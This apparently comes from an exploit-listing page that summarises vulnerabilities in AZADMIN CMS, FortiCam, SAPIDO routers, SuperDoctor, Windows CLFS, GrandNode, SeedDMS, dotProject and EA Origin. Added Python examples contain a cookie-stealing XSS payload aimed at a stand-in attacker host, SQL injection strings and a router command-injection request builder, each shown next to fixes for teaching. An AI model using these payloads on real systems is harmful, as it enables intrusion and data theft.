
Explore Vulnerabilities


Explore all Exploits:

SQL Injection in AZADMIN CMS of HIDEA v1.0

A SQL injection vulnerability exists in AZADMIN CMS of HIDEA v1.0 because the 'cod' parameter of the 'news_det.php' script is placed into a database query without sufficient sanitization. An attacker who sends a crafted HTTP request with SQL in that parameter can execute arbitrary SQL commands in the backend database and read sensitive information stored there.

FCM-MB40 Remote Command Execution as Root via CSRF

This exploit executes arbitrary commands as root on a Fortinet FortiCam MB40 (FCM-MB40) device through cross-site request forgery. The attacker serves a crafted HTML document whose JavaScript creates an image element pointing at a device URL that carries a command injection payload; when the victim's browser requests that URL, the device executes the payload. The payload used here opens a reverse shell from the device to the attacker's host, giving the attacker a root command prompt.

SAPIDO RB-1732 command line execution

This exploit executes arbitrary commands on a vulnerable SAPIDO RB-1732 router by sending a POST request to the router's /goform/formSysCmd page with the command in the sysCmd parameter. The router runs the command and returns its output inside a textarea element of the response.
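
The request shape the entry describes and the extraction of command output from the textarea, as an added example that is not part of the listing or of any SAPIDO firmware. The HTTP exchange is replaced by a constructed response string so it runs offline, and the textarea's name attribute and the sample command output are assumptions.

```python
"""Added example: build the POST the entry describes and pull the command output
out of the <textarea> in the router's reply. Not SAPIDO code; the response
below is constructed for the demonstration and its field names are assumed."""
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed sample response, shaped as the entry describes: the command
# output is echoed back inside a textarea. The name="msg" attribute and the
# output text are assumptions made for this example.
SAMPLE_RESPONSE = """<html><body>
<form action="/goform/formSysCmd" method="POST">
<input name="sysCmd" value="">
<textarea name="msg" rows="15" cols="80">uid=0(root) gid=0(root)
</textarea>
</form></body></html>"""


def build_syscmd_request(host: str, command: str) -> tuple:
    """Return (url, urlencoded_body) for the POST to /goform/formSysCmd."""
    url = f"http://{host}/goform/formSysCmd"
    body = urlencode({"sysCmd": command})  # sysCmd is the parameter named in the entry
    return url, body


class _TextareaExtractor(HTMLParser):
    """Collects the text content of every <textarea> in a document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_textarea = False
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "textarea":
            self.in_textarea = True

    def handle_endtag(self, tag):
        if tag == "textarea":
            self.in_textarea = False

    def handle_data(self, data):
        if self.in_textarea:
            self.chunks.append(data)


def extract_command_output(html_doc: str) -> str:
    """Return the stripped text of the textarea(s) in the response."""
    parser = _TextareaExtractor()
    parser.feed(html_doc)
    return "".join(parser.chunks).strip()


if __name__ == "__main__":
    url, body = build_syscmd_request("192.0.2.1", "id")
    print(url, body)
    print(extract_command_output(SAMPLE_RESPONSE))
```

The parser reads the textarea body rather than pattern-matching on the raw HTML, so output containing angle brackets or entities still comes back intact. On a real device the body would be sent with a normal HTTP client; nothing here performs network I/O.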

Remote Command Execution in SuperMicro Super Doctor 5

SuperMicro's SuperDoctor 5, the monitoring utility for SuperMicro chassis, ships an NRPE implementation that includes a remote command execution plugin. This is an intended feature, but by default it leaves the system open to unauthenticated remote command execution: anyone with an NRPE client can abuse the 'executable' plugin to run commands.

Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP

The kernel's CmpAddRemoveContainerToCLFSLog function doesn't safely create new transaction log containers, leading to arbitrary file creation and EoP.

The configuration manager in the kernel supports creating registry keys within a transaction. To store the transaction log data a CLFS log file is used, which is split into multiple containers. These transaction log files are stored in the same directory as the hive files, with names ending in BLF. Container files, with the suffix TxR.X.regtrans-ms, are created on demand when the amount of transaction data being stored exceeds the available log space.

Because these container files are created in the security context of the process creating the transaction, there is a problem: the CLFS driver always creates files with the previous mode set to UserMode. That would mean a non-administrator couldn't create transactions in any hive stored in a location they can't write to, which includes every HKLM hive, and that wouldn't be very useful. To solve this, before calling ClfsAddLogContainer the kernel code attaches the calling thread to the System process and disables any impersonation token, which ensures the call to CLFS comes from the SYSTEM user.

This becomes an issue for the user's registry hives, since those hive files are located in user-writable locations. As the container names are predictable (just an incrementing counter), it's possible to redirect the container file creation by abusing symbolic links.

GrandNode Path Traversal & Arbitrary File Download (Unauthenticated)

A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to read any file that the application process has permission to read. The vulnerability affects both Windows and Unix deployments.

Persistent Cross-Site Scripting (Stored XSS) in out/out.GroupMgr.php in SeedDMS before 5.1.11

A persistent (stored) cross-site scripting vulnerability exists in out/out.GroupMgr.php in SeedDMS before 5.1.11. An attacker authenticated as an admin user creates a new group whose name carries a JavaScript payload. The payload is stored by the application and executes in the browser of any user who visits a page where that group is displayed or selected.
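
The stored-XSS shape the entry describes, rendered vulnerably and then with output escaping, as an added example that is not SeedDMS code. The group records, the payload and the option-list markup are constructed for the demonstration.

```python
"""Added example (not SeedDMS code): a stored group name written into HTML raw
versus escaped. The GROUPS data, payload and markup are constructed here."""
from html import escape

# Constructed stored data: an admin saved a group whose name is a script tag.
# attacker.invalid is a reserved, non-resolving hostname used as a placeholder.
GROUPS = [
    {"id": 1, "name": "Engineering"},
    {"id": 2, "name": '<script>location="http://attacker.invalid/?c="+document.cookie</script>'},
]


def render_group_options_vulnerable(groups) -> str:
    """Interpolates the stored name directly, so the payload becomes live markup."""
    return "\n".join(f'<option value="{g["id"]}">{g["name"]}</option>' for g in groups)


def render_group_options_fixed(groups) -> str:
    """Escapes <, >, &, " and ' so the stored name stays text in both attribute and element context."""
    return "\n".join(
        f'<option value="{escape(str(g["id"]))}">{escape(g["name"])}</option>' for g in groups
    )


def contains_live_script(html_doc: str) -> bool:
    """Crude check used here: an unescaped <script tag in the rendered output."""
    return "<script" in html_doc.lower()


if __name__ == "__main__":
    print(render_group_options_vulnerable(GROUPS))
    print(render_group_options_fixed(GROUPS))
```

Escaping at output time is the fix that survives any admin-entered value; filtering on input alone would not protect existing stored names. escape() is called with its default quote=True so the same helper is safe inside the value attribute as well as the element body.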

dotProject 2.1.9 – Multiple SQL Injection (PoC)

dotProject 2.1.9 contains multiple SQL injection vulnerabilities. An attacker can exploit them by sending malicious payloads in the 'event_id' parameter of a POST request, allowing arbitrary SQL commands to be executed against the underlying database.
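
Both this entry and the AZADMIN CMS entry above describe the same defect: a numeric id parameter ('event_id' here, 'cod' there) concatenated into a query. The following added example, which is not code from either project, shows that pattern against an in-memory SQLite table constructed for the demonstration, a payload that reaches rows the query was meant to hide, and the parameterised query that closes the hole.

```python
"""Added example (not AZADMIN CMS or dotProject code): an id parameter pasted
into SQL, the injection it allows, and the bound-parameter fix. The table
and rows are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two published items and one unpublished draft."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO news VALUES (1, 'Public item one', 1);
        INSERT INTO news VALUES (2, 'Public item two', 1);
        INSERT INTO news VALUES (3, 'Unpublished draft', 0);
        """
    )
    return conn


def news_detail_vulnerable(conn: sqlite3.Connection, cod: str) -> list:
    """The defect both entries describe: the parameter becomes part of the SQL text."""
    query = f"SELECT id, title FROM news WHERE id = {cod} AND published = 1"
    return conn.execute(query).fetchall()


def news_detail_fixed(conn: sqlite3.Connection, cod: str) -> list:
    """Validate the type, then bind the value; it can never be parsed as SQL."""
    try:
        cod_int = int(cod)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ? AND published = 1", (cod_int,)
    ).fetchall()


# Constructed payloads: a comment that discards the published filter, and a
# UNION that pulls the hidden row directly.
PAYLOAD_BYPASS_FILTER = "1 OR 1=1 --"
PAYLOAD_UNION = "0 UNION SELECT id, title FROM news WHERE published = 0 --"

if __name__ == "__main__":
    db = make_db()
    print(news_detail_vulnerable(db, "1"))
    print(news_detail_vulnerable(db, PAYLOAD_BYPASS_FILTER))
    print(news_detail_vulnerable(db, PAYLOAD_UNION))
    print(news_detail_fixed(db, PAYLOAD_BYPASS_FILTER))
```

The fixed variant does two independent things: int() rejects anything that is not a number before the database is touched, and the ? placeholder means even a string that slipped through would be compared as a value, not executed as SQL. Either alone would stop these payloads; together they also give a clean error path for malformed input.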

EA Origin <10.5.38 Remote Code Execution

Electronic Arts' Origin client for Windows, in versions 10.5.38 and below, is vulnerable to argument injection that, if leveraged properly, can yield remote code execution. Origin does not properly sanitize user input when launching a game, allowing arbitrary command-line arguments to be injected into the Origin process.
